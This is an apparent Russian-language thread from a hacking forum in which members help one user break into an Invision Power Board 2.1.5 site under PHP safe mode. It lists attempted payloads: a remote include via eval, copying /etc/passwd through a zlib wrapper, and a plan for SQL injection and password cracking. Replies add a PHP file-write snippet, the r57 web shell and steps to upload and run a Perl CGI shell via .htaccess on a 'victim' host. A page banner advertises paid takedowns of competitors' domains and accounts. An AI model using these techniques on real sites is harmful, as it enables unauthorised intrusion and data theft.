Обход Safe Mode прл взломе Invision Power board

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Обход Safe Mode прл взломе Invision Power board

Опции темы

Поиск в этой теме

Опции просмотра

Обход Safe Mode прл взломе Invision Power board

07.09.2006, 09:03

1ten0.0net1

Time out

Регистрация: 28.11.2005

Сообщений: 547

С нами: 10762826

Репутация: 1348

Обход Safe Mode прл взломе Invision Power board

Прошу совета - есть в наличии 2.1.5 IPB форум.
Пытаюсь выполнить комманду через багу в регулятных выражениях, но всему мешает SAFE MODE.
Соответственно - запрещены все system(), passthru(), popen(), exec. Включена опция open_base_dir_ristrict. Фильтруются символы ======> $ ' " . <======
в созданном посте.
Пробовал:
eval (include(http://lalalal));//'
Пробовал eval(file_get_contents());//'
Пробовал
copy("compress.zlib:///etc/passwd", "/home/<username>/passwd.txt");
Пробовал обходить фильтрацию при помощи &#NN;
но это не катит, и я так и не понял как ее нужно обходить и к какой кодировке приводить символы.
Пробовал просто include, без eval (он, само собой, вообще не исполняется). Что посоветуете?
У меня вообще один вариант, кажется, остался - пользовать SQL-injection, расшифровывать пароль, а потом пытаться заливать что-нибудь на perl. Кстати, буду рад ссылкам на топики форума об SQL-inject в 2.1.5

Заранее, благодарю.

𝕏 Twitter Reddit Telegram Копировать ссылку

__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.

07.09.2006, 10:18

SanyaX

.::Club Life::.

Регистрация: 28.01.2005

Сообщений: 1,205

С нами: 11200586

Репутация: 1398

В шелле от rst они предусмотрены обход safe mod. А так наверно там половину функций отключены и наверно тяжело очень будет сделать. Не могу дать совета такого сильно.

__________________
-=Ok let's Go=-
-=OpenVPN=-

07.09.2006, 13:18

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

С нами: 10516826

Репутация: 3742

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

если на файле +w то иногда может прокатить

PHP код:


		
			
<?  

$file = '';

$cont = '';  

$handle = fopen($filename, 'w');  

fwrite($handle, $comecontent);  

fclose($handle);  

?>

$file – имя файла
$cont – то, что пишем в файл

https://forum.antichat.ru/thread17281-2.1.5+sql.html
https://forum.antichat.ru/thread18495-2.1.5+sql.html

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

20.12.2006, 23:49

MegaBits

Участник форума

Регистрация: 30.08.2006

Сообщений: 181

С нами: 10366322

Репутация: 45

У меня таже проблема залил r57shell v 1.31 там есть несколько встроенных способов обхода, но не один не пашет, что можете посоветовать.

22.12.2006, 16:34

Zazil

Познающий

Регистрация: 17.02.2005

Сообщений: 39

С нами: 11171966

Репутация: 1

Попробуй следующим образом.
Находим директорию в которую можно писать и доступную по ввв.
Создаем там файл .htaccess со строчкой Options +ExecCGI внутри.
Заливаем шелл туда же какойнить перловый шелл.
Далее делаем ему chmod +x shell.cgi
Потом пытаемся вызвать его из броузера.
hxxt://victim.com/blablabla/shell.cgi

У меня получалось обойти safe_mode таким способом.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обход ограничений безопасности в Invision Power Board 2.1.7	Vilen	Уязвимости CMS / форумов	5	21.09.2006 22:12
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос.	dukalis(AwP)	Уязвимости CMS / форумов	14	19.04.2006 19:40
Обход регистрации в Invision Power Board v1.3 Final	DeeIP	Уязвимости CMS / форумов	1	10.04.2005 20:35

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules